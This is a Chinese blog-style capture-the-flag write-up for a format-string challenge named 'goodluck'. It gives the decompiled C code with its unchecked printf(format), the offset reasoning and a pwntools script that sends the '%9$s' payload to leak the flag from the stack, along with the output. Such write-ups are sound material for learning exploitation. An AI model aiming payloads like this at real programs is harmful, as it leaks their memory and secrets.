格式化字符串漏洞实验例子(一)easy

作者: 鸡龙 | 来源:发表于2019-03-10 22:17 被阅读0次

格式化字符串漏洞实验例子(一)easy
格式化字符串漏洞实验(转载)
格式化字符串
lab9
格式化字符串漏洞实验
2019-10-21
hxb2017 pwne easy format vuln
再谈格式化字符串
isitdtuctf_pwn_wp
攻防世界 string wp

1、goodluck

checksec查防

root@user-virtual-machine:/mnt/hgfs/CTF/share/goodluck# checksec goodluck
[*] '/mnt/hgfs/CTF/share/goodluck/goodluck'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

再用ida,ctrl+f5转c代码
目的要将flag.txt中的内容输出

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [rsp+3h] [rbp-3Dh]
  signed int i; // [rsp+4h] [rbp-3Ch]
  signed int j; // [rsp+4h] [rbp-3Ch]
  char *format; // [rsp+8h] [rbp-38h]
  _IO_FILE *fp; // [rsp+10h] [rbp-30h]
  char *v9; // [rsp+18h] [rbp-28h]
  char v10[24]; // [rsp+20h] [rbp-20h]
  unsigned __int64 v11; // [rsp+38h] [rbp-8h]

  v11 = __readfsqword(0x28u);
  fp = fopen("flag.txt", "r");
  for ( i = 0; i <= 21; ++i )
    v10[i] = _IO_getc(fp);
  fclose(fp);
  v9 = v10;
  puts("what's the flag");
  fflush(_bss_start);
  format = 0LL;
  __isoc99_scanf("%ms", &format);
  for ( j = 0; j <= 21; ++j )
  {
    v4 = format[j];
    if ( !v4 || v10[j] != v4 )
    {
      puts("You answered:");
      printf(format);
      puts("\nBut that was totally wrong lol get rekt");
      fflush(_bss_start);
      return 0;
    }
  }
  printf("That's right, the flag is %s\n", v9);
  fflush(_bss_start);
  return 0;
}

该处for循环发现printf函数

  for ( j = 0; j <= 21; ++j )
  {
    v4 = format[j];
    if ( !v4 || v10[j] != v4 )
    {
      puts("You answered:");
      printf(format);
      puts("\nBut that was totally wrong lol get rekt");
      fflush(_bss_start);
      return 0;
    }

对其进行printf断点分析

对输出flag处地址进行计算偏移量

image.png

计算出偏移量为10
我们需要输入9个参数来到达覆盖位置
payload

from pwn import *
from LibcSearcher import *
goodluck = ELF('./goodluck')
if args['REMOTE']:
    sh = remote('pwn.sniperoj.cn', 30017)
else:
    sh = process('./goodluck')
payload = "%9$s"
print payload
##gdb.attach(sh)
sh.sendline(payload)
print sh.recv()
sh.interactive()

成功输出

[*] '/mnt/hgfs/CTF/share/goodluck/goodluck'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Starting local process './goodluck': pid 21457
%9$s
[DEBUG] Sent 0x5 bytes:
    '%9$s\n'
[*] Process './goodluck' stopped with exit code 0 (pid 21457)
[DEBUG] Received 0x5d bytes:
    "what's the flag\n"
    'You answered:\n'
    'flag{12131111111111112\n'
    'But that was totally wrong lol get rekt\n'
what's the flag
You answered:
flag{12131111111111112
But that was totally wrong lol get rekt

[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$